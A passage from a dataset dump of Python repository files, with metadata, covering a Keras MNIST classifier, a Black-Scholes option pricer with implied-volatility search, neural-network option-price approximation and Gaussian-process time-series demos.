decoded_series_pd.mean(axis=0)\r\nnew_mean = ret.mean(axis=0)\r\nnew_ret = decoded_series_pd.apply(lambda x: 1 + x - old_mean + new_mean, axis=1)\r\n\r\ndecoded_data = copy.deepcopy(data)\r\ndecoded_data.ix[1:] = new_ret.values\r\ndecoded_data = decoded_data.cumprod(axis=0)\r\n\r\ncol = data.columns[0]\r\nplt.figure()\r\nplt.plot(data[col])\r\nplt.plot(decoded_data[col])\r\nplt.show()\r\n\r\n# Initial correlation matrix\r\nplt.figure()\r\nplt.matshow(data.corr())\r\nx.set_xticklabels([''] + alpha)\r\n# Sparse correlation matrix\r\nplt.figure()\r\nplt.matshow(decoded_series_pd.corr())\r\nplt.show()\r\n\r\nprint(\"done\")\r\n"
},
{
"alpha_fraction": 0.684587836265564,
"alphanum_fraction": 0.7311828136444092,
"avg_line_length": 23.545454025268555,
"blob_id": "b9be80451fc9c7568781d0d8fa09fdf4f123578c",
"content_id": "9c5ffef2ab421c0faf5306b579ed068747ccc3d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 11,
"path": "/SGTrip/README.txt",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "To run all these codes, you will need \r\n-The Anaconda latest distribution working on Python 3.5\r\n-Keras\r\n-Tensorflow\r\n-Theano\r\n\r\nBefore running the code, change the value of \"your_local_folder\" in the path.py file.\r\n\r\nContact me if you need more info:\r\[email protected]\r\n+33 1 57 29 03 60"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 99,
"blob_id": "c9fa6b422695d874c223a9072bfd0fc73bfc1a25",
"content_id": "12d7c124c3817b13ac888f0aef6d79aebb602ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 1,
"path": "/SGTrip/MNIST/README.txt",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "The MNIST data file called \"mnist.pkl.gz\" can be downloaded at the url: https://github.com/mnielsen"
},
{
"alpha_fraction": 0.662813127040863,
"alphanum_fraction": 0.6888246536254883,
"avg_line_length": 28.52941131591797,
"blob_id": "601a3d1efbd7644a7d489b30e899f86a77dee1f3",
"content_id": "768c9a6030e6eb96110e648415aca9a9116f7258",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2076,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 68,
"path": "/SGTrip/MNIST/MNIST_data_CNN.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# LOADING\r\nfilename=\"mnist.pkl.gz\"\r\n\r\nwith gzip.open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n training_data, validation_data, test_data = u.load()\r\n\r\nprint(training_data[0].__len__())\r\nprint(validation_data[0].__len__())\r\nprint(test_data[0].__len__())\r\n\r\n\r\n# NEURAL NETWORK\r\n# Convert Y to dummy\r\nfrom keras.utils import np_utils\r\n# from keras.utils.visualize_util import plot as keras_plot\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Convolution2D, Flatten\r\nfrom keras.layers.pooling import MaxPooling2D\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ndata = test_data#training_data\r\nn = 28\r\nX = (data[0]).reshape(data[0].shape[0], 1, n, n)\r\nY = np_utils.to_categorical(data[1])\r\nXvalid = (validation_data[0]).reshape(validation_data[0].shape[0], 1, n, n)\r\nYvalid = np_utils.to_categorical(validation_data[1])\r\ninput_dim = X[0].shape\r\noutput_dim = 10\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(20, 5, 5, input_shape=(1, n, n), activation='relu', dim_ordering='th'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2), dim_ordering='th'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(100, name='hidden_layer', activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='softmax'))\r\n\r\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\nprint(model.summary())\r\n# keras_plot(model, to_file='model.png')\r\n# fit\r\nres = model.fit(X, Y, batch_size=10, nb_epoch=15, validation_data=(Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['acc'])\r\nplt.plot(res.epoch, res.history['val_acc'])\r\n\r\n# predict\r\ndata = training_data#test_data\r\nX = (data[0]).reshape(data[0].shape[0], 1, n, n)\r\nY = data[1]\r\nYhat = model.predict(X)\r\n\r\nprint(np.mean(np.argmax(Yhat, axis=1) == Y))\r\n"
},
{
"alpha_fraction": 0.5333611369132996,
"alphanum_fraction": 0.5460800528526306,
"avg_line_length": 30.18791961669922,
"blob_id": "8b7cc04b6b9162dc7d092c845f48ecf783c22bde",
"content_id": "b9e07b88639e1f540cf81a937f5622ef12b9d426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4796,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 149,
"path": "/SGTrip/BS/BSpricer.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport math as m\r\nfrom scipy.stats import norm\r\nfrom scipy.linalg import solve_banded\r\nfrom scipy.optimize import root\r\nimport numpy as np\r\nimport copy\r\n\r\n# Black and Scholes option model\r\nclass PayoffCall(object):\r\n def __init__(self, strike):\r\n self.strike = strike\r\n\r\n def __call__(self, x):\r\n return max(x - self.strike, 0)\r\n\r\n\r\nclass PayoffPut(PayoffCall):\r\n def __call__(self, x):\r\n return max(self.strike - x, 0)\r\n\r\n\r\nclass ModelBlackScholes(object):\r\n def __init__(self, s, expiry, payoff, r=0.0, sigma=0.0, y=0.0, sigma_surface=None, delta=None, moneyness=None):\r\n self.s = s\r\n self.expiry = expiry\r\n self.payoff = payoff\r\n self.r = r\r\n self.sigma = sigma\r\n self.y = y\r\n self.sigma_surface = sigma_surface\r\n self.sigma_update()\r\n self.strike_update(delta, moneyness)\r\n\r\n def sigma_update(self):\r\n if self.sigma_surface is not None:\r\n self.sigma = self.sigma_surface(self.expiry, self.payoff.strike / self.s)\r\n\r\n def strike_update(self, delta=None, moneyness=None):\r\n if delta is not None:\r\n self.set_strike(self.s)\r\n self.set_strike(self.strike_from_delta(delta))\r\n if moneyness is not None:\r\n self.set_strike(moneyness * self.s)\r\n\r\n def d1(self):\r\n try:\r\n if self.sigma == 0:\r\n raise ZeroDivisionError\r\n d = (m.log(self.s / self.payoff.strike) + (\r\n self.r - self.y + self.sigma ** 2 / 2) * self.expiry) / self.sigma / m.sqrt(\r\n self.expiry)\r\n except ZeroDivisionError:\r\n d = np.inf * (1.0 if self.s > self.payoff.strike else -1.0)\r\n return d\r\n\r\n def d2(self):\r\n return self.d1() - self.sigma * m.sqrt(self.expiry)\r\n\r\n def __call__(self):\r\n if type(self.payoff) in [PayoffCall]:\r\n price = self.s * m.exp(-self.y * self.expiry) * norm.cdf(self.d1()) - self.payoff.strike * m.exp(\r\n -self.r * self.expiry) * norm.cdf(\r\n self.d2())\r\n elif type(self.payoff) in [PayoffPut]:\r\n price = -self.s * m.exp(-self.y * self.expiry) * norm.cdf(-self.d1()) + self.payoff.strike * m.exp(\r\n -self.r * self.expiry) * norm.cdf(-self.d2())\r\n return price\r\n\r\n def delta(self):\r\n if type(self.payoff) in [PayoffCall]:\r\n delta = norm.cdf(self.d1())\r\n elif type(self.payoff) in [PayoffPut]:\r\n delta = norm.cdf(self.d1()) - 1\r\n return delta\r\n\r\n def gamma(self):\r\n return m.exp(-self.y * self.expiry) * norm.pdf(self.d1()) / self.s / self.sigma / m.sqrt(self.expiry)\r\n\r\n def gamma_strike(self):\r\n return -self.s / self.payoff.strike * self.gamma()\r\n\r\n def vega(self):\r\n return self.s * m.exp(-self.y * self.expiry) * norm.pdf(self.d1()) * m.sqrt(self.expiry)\r\n\r\n def strike_from_delta(self, delta_match, precision=10, n_iter_max=100):\r\n n_iter = 0\r\n option = copy.deepcopy(self)\r\n\r\n f = option.delta() - delta_match\r\n error = abs(f)\r\n\r\n while error > 10 ** (-precision) and n_iter < n_iter_max:\r\n f_prime = option.gamma_strike()\r\n # print f_prime\r\n # print -self.s / self.payoff.strike * self.gamma()\r\n option.set_strike(option.payoff.strike - f / f_prime)\r\n\r\n f = option.delta() - delta_match\r\n n_iter += 1\r\n error = abs(f)\r\n\r\n if n_iter == n_iter_max:\r\n print('Warning: raised n_iter_max in strike_from_delta method')\r\n\r\n output = option.payoff.strike\r\n del option\r\n return output\r\n\r\n def set_s(self, s):\r\n self.s = s\r\n self.sigma_update()\r\n\r\n def set_strike(self, strike):\r\n self.payoff.strike = strike\r\n self.sigma_update()\r\n\r\n def set_sigma(self, sigma):\r\n self.sigma = sigma\r\n\r\n def 
set_sigma_surface(self, sigma_surface):\r\n self.sigma_surface = sigma_surface\r\n self.sigma_update()\r\n\r\n\r\ndef implied_sigma(S, expiry, payoff, strike, r, price, eps=0.0001, sigma_min = 0.0, sigma_max = 1.0, max_iter=100):\r\n sigma = (sigma_min + sigma_max) / 2.0\r\n model = ModelBlackScholes(S, expiry, payoff(strike), r=r, sigma=sigma)\r\n model_price = model()\r\n error = 10000.0\r\n iter = 0\r\n\r\n while(error >= eps and iter <= max_iter):\r\n if model_price >= price:\r\n sigma_max = sigma\r\n else:\r\n sigma_min = sigma\r\n sigma = (sigma_min + sigma_max) / 2.0\r\n\r\n model.set_sigma(sigma)\r\n model_price = model()\r\n error = abs(model_price - price)\r\n iter += 1\r\n\r\n if iter > max_iter and error >= eps:\r\n return np.nan\r\n else:\r\n return sigma\r\n"
},
{
"alpha_fraction": 0.6167641282081604,
"alphanum_fraction": 0.6588693857192993,
"avg_line_length": 29.280487060546875,
"blob_id": "da9b6a2b5b6fc6ca112cd550ec4b570b74a668cf",
"content_id": "c56177597d44f3b9ac31ebb8ded573abf7ce5bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2565,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 82,
"path": "/SGTrip/BS/Option_BS2_stat.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom BSpricer import *\r\nfrom scipy.special import expit, logit\r\nimport pickle\r\n\r\nfilename = \"BS_stat_data\"\r\n\r\nwith open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n Xall, Yall, = u.load()\r\n\r\nX = Xall[:10000]\r\nY = Yall[:10000]\r\nXvalid = Xall[10000:20000]\r\nYvalid = Yall[10000:20000]\r\n \r\n# NEURAL NETWORK\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Convolution2D, Dropout\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ninput_dim = X[0].shape[0]\r\noutput_dim = 1\r\n\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\nmodel = Sequential()\r\nmodel.add(Dense(10, input_dim=input_dim, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(10, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(10, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='sigmoid'))\r\nmodel.compile(optimizer='rmsprop', loss='mse')\r\nprint(model.summary())\r\n\r\n# fit\r\nres = model.fit(X, Y, batch_size=50, nb_epoch=50, validation_data = (Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\n#model_file_name = \"BS/model.h5\"\r\n#model.save(model_file_name)\r\n#model = load_model(model_file_name)\r\n\r\n# predict\r\nS = np.arange(0.1, 1.1, 0.01)\r\nexpiry = np.array([0.5] * S.shape[0])\r\nstrike = np.array([0.5] * S.shape[0])\r\nsigma = np.array([0.2] * S.shape[0])\r\nX = np.transpose(np.array([S, expiry, strike, sigma]))\r\nY = np.array([ModelBlackScholes(x[0], x[1], PayoffCall(x[2]), sigma=x[3])() / x[0] for x in X])\r\n\r\nmoneyness = strike / S\r\nsigmat = sigma * np.array([m.sqrt(x) for x in expiry])\r\nX = np.transpose(np.array([moneyness, sigmat]))\r\nYhat = model.predict(X)\r\n\r\nplt.figure()\r\nplt.plot(S, Y)\r\nplt.plot(S, Yhat)\r\n\r\n# Implied vol\r\nS = np.arange(0.35, 0.81, 0.01)\r\nexpiry = np.array([0.5] * S.shape[0])\r\nstrike = np.array([0.5] * S.shape[0])\r\nsigma = np.array([0.2] * S.shape[0])\r\nX_BS = np.transpose(np.array([S, expiry, strike, sigma]))\r\nY = np.array([ModelBlackScholes(x[0], x[1], PayoffCall(x[2]), sigma=x[3])() / x[0] for x in X_BS])\r\n\r\nmoneyness = strike / S\r\nsigmat = sigma * np.array([m.sqrt(x) for x in expiry])\r\nX_NN = np.transpose(np.array([moneyness, sigmat]))\r\nYhat = model.predict(X_NN)\r\nsigmahat = np.array([implied_sigma(x[0], x[1], PayoffCall, x[2], 0.0, p[0] * x[0]) for x, p in zip(X_BS, Yhat)])\r\n\r\n \r\nplt.figure()\r\nplt.plot(moneyness, sigma)\r\nplt.plot(moneyness, sigmahat)\r\n"
},
{
"alpha_fraction": 0.531642735004425,
"alphanum_fraction": 0.565978467464447,
"avg_line_length": 22.618783950805664,
"blob_id": "74462ca0d57235979954f29e0016d6784e21700e",
"content_id": "bedcec6d195d7b2afb69b4b61120ec52327944a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4456,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 181,
"path": "/SM/GP_timeseries_example.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "#%reset -f\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors, ticker, cm\r\nfrom matplotlib.mlab import bivariate_normal\r\nfrom numpy.linalg import inv\r\nimport importlib as imp # e.g) imp.reload(gu)\r\n\r\nimport kernel_functions as kf\r\nimport gp_utils as gu\r\n# exec(open(\"gp_utils.py\").read())\r\n\r\nplt.ion()\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef true_func(x):\r\n return np.sin(np.pi * x)\r\n\r\nx = np.linspace(1, 7, 1000)\r\nfx = true_func(x)\r\n\r\nplt.figure(figsize=(12, 6))\r\nplt.subplot(121)\r\nplt.plot(x, fx, 'orange')\r\nplt.grid(alpha=0.2)\r\nplt.ylim((-3, 3))\r\nplt.xlabel(r'$time$')\r\nplt.ylabel(r'$f(x)$')\r\n\r\ncovmat_prior = kf.kfunc_gauss(x, x, l=1)\r\nplt.subplot(122)\r\ngu.gp_plot(np.nan, np.nan, x, np.zeros_like(x), covmat_prior,\r\n n_sample=5, main=\"Samples from a prior\")\r\nplt.plot(x, fx, color='orange')\r\nplt.xlabel(r'$time$')\r\nplt.ylabel(r'$f(x)$')\r\n\r\n# Sampling from the prior\r\n# input observaitons\r\nx_obs = np.linspace(1, 5, 30)\r\n# noisy output obvervations\r\nsig_noise = np.sqrt(0.05)\r\ny_obs = true_func(x_obs) + np.random.normal(0, sig_noise, len(x_obs))\r\nplt.plot(x_obs, y_obs, 'o')\r\nplt.plot(x, true_func(x), color='orange')\r\nplt.grid(alpha=0.2)\r\n\r\nx_pred = x.copy()\r\n\r\n# gauss\r\nkernel_used = kf.kfunc_gauss\r\nparams = {'l': 0.5}\r\nxo = x_obs[0:2]\r\nyo = y_obs[0:2]\r\nmu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(xo, yo, x_pred, mu, var)\r\nplt.plot(x, fx, 'orange')\r\n\r\ninput(\"\")\r\n\r\nfor i in range(3, len(x_obs) + 1):\r\n plt.clf()\r\n xo = x_obs[0:i]\r\n yo = y_obs[0:i]\r\n mu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n gu.gp_plot(xo, yo, x_pred, mu, var)\r\n plt.plot(x, fx, 'orange', alpha=0.5)\r\n plt.pause(0.1)\r\n\r\n\r\n# periodicic\r\nkernel_used = kf.kfunc_per\r\nparams = {'l': 1, 'p': 2}\r\nxo = x_obs[0:2]\r\nyo = y_obs[0:2]\r\nmu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(xo, yo, x_pred, mu, var)\r\nplt.plot(x, fx, 'orange')\r\n\r\ninput(\"\")\r\n\r\nfor i in range(3, len(x_obs) + 1):\r\n plt.clf()\r\n xo = x_obs[0:i]\r\n yo = y_obs[0:i]\r\n mu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\n gu.gp_plot(xo, yo, x_pred, mu, var)\r\n plt.plot(x, fx, 'orange', alpha=0.5)\r\n plt.pause(0.1)\r\n\r\n\r\n# ----------------------\r\n# Real Exmaple\r\n\r\n#tmp = pd.read_csv('shop.csv')\r\ntmp = pd.read_csv('auto.csv')\r\ntmp = tmp.sort_index(ascending=False)\r\n\r\ndt_raw = pd.Series(tmp['Close'].values, index=pd.to_datetime(tmp['Date']))\r\ndt_smth = pd.ewma(dt_raw, halflife=15)\r\ndt = dt_smth.resample('W-MON', how='last')\r\n#dt = dt_smth.resample('M', how='last')\r\nplt.figure()\r\nplt.plot(dt, color='orange')\r\nplt.grid(alpha=0.2)\r\n\r\nt = np.arange(1, len(dt) + 1)\r\nno_sample = 2\r\nsig_noise = np.sqrt(0.01)\r\n\r\n# periodicic\r\nkernel_used = kf.kfunc_per\r\nparams = {'l': 5, 'p': 12 * 4}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, 
dt, color='orange')\r\n plt.pause(0.001)\r\n\r\n# linear\r\nkernel_used = kf.kfunc_lin\r\nparams = {'b': 1, 'v': 0.1, 'c': 0}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, dt, color='orange')\r\n plt.pause(0.001)\r\n\r\n## periodicic + linear\r\nkernel_used = kf.kfunc_per_add_lin\r\nparams = {'h': 1, 'l': 5, 'p': 12 * 4.4, 'b': 1, 'v': 0.1, 'c': 0}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, dt, color='orange')\r\n plt.pause(0.001)\r\n"
}
] | 14 |
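The BSpricer record above pairs a closed-form Black-Scholes model with a bisection search for implied volatility (`implied_sigma`), exploiting the fact that the option price is monotonically increasing in sigma. As a sanity check on that logic, here is a minimal, self-contained sketch of the same round trip; it re-derives the call formula rather than importing the module, and the inputs (S=100, K=100, T=1, r=1%, sigma=20%) are illustrative assumptions only.

```python
import math
from scipy.stats import norm

def bs_call(s, k, t, r, sigma):
    # Closed-form Black-Scholes call price (no dividend yield).
    d1 = (math.log(s / k) + (r + sigma ** 2 / 2) * t) / (sigma * math.sqrt(t))
    d2 = d1 - sigma * math.sqrt(t)
    return s * norm.cdf(d1) - k * math.exp(-r * t) * norm.cdf(d2)

def implied_vol(price, s, k, t, r, lo=0.0, hi=1.0, eps=1e-8):
    # Bisection: the call price is monotonically increasing in sigma,
    # so we can halve the bracket until it is tighter than eps.
    for _ in range(100):
        mid = (lo + hi) / 2.0
        if bs_call(s, k, t, r, mid) >= price:
            hi = mid
        else:
            lo = mid
        if hi - lo < eps:
            break
    return (lo + hi) / 2.0

price = bs_call(100.0, 100.0, 1.0, 0.01, 0.20)
assert abs(implied_vol(price, 100.0, 100.0, 1.0, 0.01) - 0.20) < 1e-6
```

The round trip recovers the input volatility, which is exactly the property the record's `implied_sigma` relies on.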
flowonthegoliv/ENVS231
|
https://github.com/flowonthegoliv/ENVS231
|
d5a3ae20e8e4211f200ae7151be027a1e58a34bc
|
1f85a113a8b95ed4c1a7ea2302ca1b03b3975c96
|
f04c633967e311c512bea60a90ac08c278cd24ce
|
refs/heads/main
| 2023-07-08T20:24:53.149940 | 2021-08-03T11:55:23 | 2021-08-03T11:55:23 | 362,806,678 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.505773663520813,
"alphanum_fraction": 0.5588914752006531,
"avg_line_length": 26.0625,
"blob_id": "95bad92ecf24658e69a8b595f1005f773f6fdb63",
"content_id": "f613761fea01c875d19613bdf34a0375306025f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/ENVS231_data.py",
"repo_name": "flowonthegoliv/ENVS231",
"src_encoding": "UTF-8",
"text": "def make_data(student_id):\n data = []\n from random import seed\n from random import random\n seed(student_id)\n import numpy as np\n samples = 24*60*7\n height = 500;\n step = 10\n n = samples*(height/step)\n n = np.int(n);\n number = np.zeros((n,1))\n data = np.zeros((samples,np.int(height/step)))\n r = (np.linspace(0.0001,1,np.int(height/step))**0.143)\n s = np.linspace(0.1,1,np.int(height/step))\n base = 25;\n\n for i in range(0,np.int(height/step)):\n a = np.zeros((samples,40))\n for j in range(0,40):\n tmp = random()\n if tmp < 0.2: \n tmp = 1;\n add = np.int((200-base) + base*tmp);\n add = np.int(base*tmp)\n # print(add)\n a[:,j] = np.sin(np.resize(np.linspace(0,2*np.pi,add),samples));\n base = base + 5 \n x = np.sum(a[:,:],1) ;\n data[:,i] = r[i] + x*s[i]\n data = data + 3 + (10*random())/2;\n return data\n"
}
] | 1 |
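For orientation, `make_data` above returns one week of minute-resolution synthetic profiles seeded per student: 24*60*7 = 10,080 samples across height/step = 50 levels. A hypothetical call is sketched below (the student ID is an arbitrary example value); note that `np.int` was removed in NumPy 1.24, so on a modern NumPy the function body needs plain `int()` for this to run.

```python
# Hypothetical usage sketch for the make_data generator above.
data = make_data(201234567)   # arbitrary example student_id
print(data.shape)             # expected: (10080, 50) -- one week of minutes x 50 height levels
print(data[:5, 0])            # first five minutes at the lowest level
```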
vpluma/ExampleFinal-IntroCS-Python
|
https://github.com/vpluma/ExampleFinal-IntroCS-Python
|
c8af46ee8faa88fd88614ba062d0fbb422ed74ff
|
0c2332d89bcb5a5c8fc3b8d31c24b68abdf51519
|
cd6920597fd22aef385c5b3fd36e4ee78fc49639
|
refs/heads/master
| 2023-02-02T09:00:02.487149 | 2020-12-17T07:28:41 | 2020-12-17T07:28:41 | 322,215,174 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6019032597541809,
"alphanum_fraction": 0.6090404391288757,
"avg_line_length": 22.11111068725586,
"blob_id": "3d86df4a63297ebc9cd64519f381f21a71c38b4e",
"content_id": "a4caf0fe7687ef5f6d1e9fcc947a3d5aa1552319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 54,
"path": "/main.py",
"repo_name": "vpluma/ExampleFinal-IntroCS-Python",
"src_encoding": "UTF-8",
"text": "# Example Semester 1 - Final Python Project\n# Added GitHub Access To REPL.IT\ndef openingBanner():\n\tprint(\"+================+\")\n\tprint(\"+ Opening Banner +\")\n\tprint(\"+================+\")\n\ndef closingBanner():\n\tprint(\" \")\n\tprint(\"+================+\")\n\tprint(\"+ Closing Banner +\")\n\tprint(\"+================+\")\n\ndef askBasic():\n\tname = input(\"Enter name: \")\n\tage = int(input(\"Enter age: \"))\n\tgpa = float(input(\"Enter GPA: \"))\n\treturn name, age, gpa\n\ndef clubs(name):\n\tclubList = []\n\tprint(\"Hi \" + name + \"!\")\n\tnumClubs = int(input(\"Enter number of clubs: \"))\n\tfor i in range(numClubs):\n\t\tclub = input(\"Enter club name: \")\n\t\tclubList.append(club)\n\treturn clubList\n\ndef isHonorStudent(name, gpa):\n\tif gpa >= 3.75:\n\t\tprint(name + \" has earned Highest Honors\")\n\telif gpa >= 3.5 and gpa < 3.75:\n\t\tprint(name + \" has earned High Honors\")\n\telse:\n\t\tprint(name + \" has earned Honors\")\n\ndef printResults(clubList, name, gpa):\n\tclosingBanner()\n\tprint(\"GPA: \" + str(gpa) )\n\tisHonorStudent(name, gpa)\n\tprintClubs(clubList)\n\ndef printClubs(clubList):\n\tprint(\"Club List: \", end = \" \")\n\tfor eachClub in clubList:\n\t\tprint(eachClub, end = \". \")\n\ndef main():\n\topeningBanner()\n\tname, age, gpa = askBasic()\n\tclubList = clubs(name)\n\tprintResults(clubList, name, gpa)\n\nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 1 |
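The only real branching logic in this final-project record is the honors banding in `isHonorStudent` (>= 3.75 Highest Honors, 3.5 up to 3.75 High Honors, everything else Honors). A sketch of a testable variant, returning the label instead of printing it, makes the thresholds easy to check; this helper is not part of the original assignment.

```python
def honors_label(gpa):
    # Same thresholds as isHonorStudent above, but returned instead of printed.
    if gpa >= 3.75:
        return "Highest Honors"
    elif gpa >= 3.5:
        return "High Honors"
    else:
        return "Honors"

assert honors_label(3.8) == "Highest Honors"
assert honors_label(3.6) == "High Honors"
assert honors_label(3.2) == "Honors"
```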
moyogo/vharfbuzz
|
https://github.com/moyogo/vharfbuzz
|
a0245c24c8f0c0ebfbcac9c5c79dff7ca73c704f
|
03adca1942e046077242936c756687cfb063dc9e
|
7b15617742d45e088b64ec2707dc7b14d67dd5f7
|
refs/heads/main
| 2023-06-06T19:59:07.822982 | 2021-07-12T07:35:10 | 2021-07-12T07:35:10 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5369211435317993,
"alphanum_fraction": 0.5453692078590393,
"avg_line_length": 33.36559295654297,
"blob_id": "dbc717dc83e1f1ae8d632f12621a2deacd95e8b8",
"content_id": "8b2b339577d6da58a7c7b9a248f2c72f0c3af7e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9588,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 279,
"path": "/lib/vharfbuzz/__init__.py",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "__author__ = \"\"\"Simon Cozens\"\"\"\n__email__ = \"[email protected]\"\n__version__ = '0.1.0'\n\nimport uharfbuzz as hb\nfrom fontTools.ttLib import TTFont\nimport re\n\nclass FakeBuffer():\n def __init__(self):\n pass\n\nclass FakeItem():\n def __init__(self):\n pass\n\n\nclass Vharfbuzz:\n \"\"\"A user-friendlier way to use Harfbuzz in Python.\n\n Args:\n filename (str): A path to a TrueType font file.\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n with open(self.filename, \"rb\") as fontfile:\n self.fontdata = fontfile.read()\n self.ttfont = TTFont(filename)\n self.glyphOrder = self.ttfont.getGlyphOrder()\n self.prepare_shaper()\n self.shapers = None\n self.drawfuncs = None\n\n def prepare_shaper(self):\n face = hb.Face(self.fontdata)\n font = hb.Font(face)\n upem = face.upem\n font.scale = (upem, upem)\n hb.ot_font_set_funcs(font)\n self.hbfont = font\n\n def make_message_handling_function(self, buf, onchange):\n self.history = {\"GSUB\": [], \"GPOS\": []}\n self.lastLookupID = None\n\n def handle_message(msg, buf2):\n m = re.match(\"start lookup (\\\\d+)\", msg)\n if m:\n lookupid = int(m[1])\n self.history[self.stage].append(self.serialize_buf(buf2))\n\n m = re.match(\"end lookup (\\\\d+)\", msg)\n if m:\n lookupid = int(m[1])\n if self.serialize_buf(buf2) != self.history[self.stage][-1]:\n onchange(self, self.stage, lookupid, self._copy_buf(buf2))\n self.history[self.stage].pop()\n if msg.startswith(\"start GPOS stage\"):\n self.stage = \"GPOS\"\n\n return 